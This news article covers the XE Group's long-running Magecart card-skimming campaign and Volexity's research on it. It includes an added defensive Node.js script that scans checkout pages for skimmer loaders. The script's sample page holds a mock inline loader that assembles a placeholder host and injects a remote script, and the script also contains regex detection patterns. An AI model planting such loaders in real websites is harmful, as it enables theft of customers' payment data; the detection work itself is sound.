
Eight years long chain of attack may be related to one group


Last Updated on 09/12/2021 by Nidhi Khandelwal

The ‘XE Group,’ a little-known group of Vietnamese hackers, has been tied to eight years of commercial hacking and credit card skimming.

The group is suspected of stealing thousands of credit card numbers per day, primarily from the websites of restaurants, non-profit organizations, art galleries, and travel businesses.


The actors compromise externally facing services using publicly available exploits, most notably for vulnerabilities in Telerik UI, and then install malware that steals passwords and payment information.

The group’s operations were first detailed in a 2020 Malwarebytes report, but Volexity published a more in-depth study of recent compromises attributed to the group yesterday.

Further details emerge

Volexity was able to trace the XE Group’s infrastructure over the past three years and has published its technical findings and indicators of compromise (IOCs) on GitHub.

Because the loader that injects the malicious JavaScript uses a distinctive technique, the researchers were able to locate a large number of compromised sites all carrying the same skimmer.

“The code used to load the malicious JavaScript from this page exposes an unusual technique: the attacker uses the JavaScript keyword ‘object’ to populate the domain value,” the researchers wrote in the Volexity study.

Such attacks are known as “Magecart” attacks: a threat actor compromises an e-commerce site and inserts malicious JavaScript that captures customer and payment information as it is submitted in the browser. The stolen data is then sent to a server the attackers control, where they collect it.
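The two loader traits described above, a script loaded from a domain the site does not normally use and a domain value assembled at runtime rather than written as a plain string, are the kind of thing a site owner can triage statically. The following Node.js script is an added example and is not code from the Volexity report or from the XE Group loader itself; the allowlist, the sample page and the indicator regexes are assumptions constructed for illustration, and the script does not attempt to reproduce the group’s specific “object” keyword trick, only the general pattern of a dynamically built script source.

```javascript
// Added example (not from the article or the Volexity report): a small
// static triage pass over an HTML page that flags two Magecart-loader traits:
//   1. an external <script src> whose host is not on the site's own allowlist
//   2. an inline <script> that creates a script element and builds its URL
//      from pieces at runtime (concatenation / join / fromCharCode)
// The allowlist and the sample page below are constructed for this example.

const ALLOWED_HOSTS = new Set(['shop.example', 'cdn.example']); // assumed allowlist

// Constructed sample page: one legitimate script, one unlisted external script,
// and one inline loader that assembles its src from string fragments.
const SAMPLE_HTML = `
<html><head>
<script src="https://cdn.example/app.js"></script>
<script src="https://stats-collector.invalid/s.js"></script>
<script>
var d = document, s = d.createElement('script');
s.src = 'https://' + ['pay', 'ment', 'host', '.invalid'].join('') + '/l.js';
d.head.appendChild(s);
</script>
</head><body><form id="checkout"></form></body></html>`;

// Pull every <script> out of the page as { src, body }.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return scripts;
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Indicators of an inline loader that builds its own script URL. Two or more
// hits in one inline block is treated as suspicious; one alone is too common.
const INLINE_INDICATORS = [
  /createElement\s*\(\s*["']script["']\s*\)/i,
  /\.src\s*=/i,
  /\bjoin\s*\(/i,
  /fromCharCode/i,
];

// Returns a list of findings for the page; an empty list means nothing flagged.
function triage(html, allowed = ALLOWED_HOSTS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      const host = hostOf(s.src);
      if (host && !allowed.has(host)) {
        findings.push({ kind: 'external-unlisted', detail: host });
      }
    } else {
      const hits = INLINE_INDICATORS.filter((r) => r.test(s.body)).length;
      if (hits >= 2) {
        findings.push({ kind: 'inline-dynamic-loader', detail: hits + ' indicators' });
      }
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage(SAMPLE_HTML));
}

module.exports = { triage, extractScripts, hostOf, SAMPLE_HTML, ALLOWED_HOSTS };
```

Run against the constructed page, `triage` reports the unlisted host `stats-collector.invalid` and the inline loader with three indicators; the legitimate `cdn.example` script is not flagged. A real deployment would feed it the HTML of the checkout page fetched from outside the CDN cache and compare the result against a known-good baseline, since skimmers are typically injected into exactly the pages where card data is entered.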


The long-term success of these attacks depends on how long the skimmer can remain on a compromised website without being detected by security software.

When a sample of this skimmer is uploaded to VirusTotal, it receives a 0/57 detection score, meaning that none of the engines flagged it at the time of submission. That score shows signature-based tools were not catching the group’s JavaScript; it should not be read as evidence that the script is benign, since static antivirus scanning of a short, obfuscated snippet is a weak signal either way. Site owners are better served by monitoring the integrity of the scripts served on their checkout pages than by relying on antivirus verdicts.

Nidhi Khandelwal
Nidhi is a tech news/research contributor at TheDigitalHacker. She publishes about techno geopolitics, privacy, and data breach.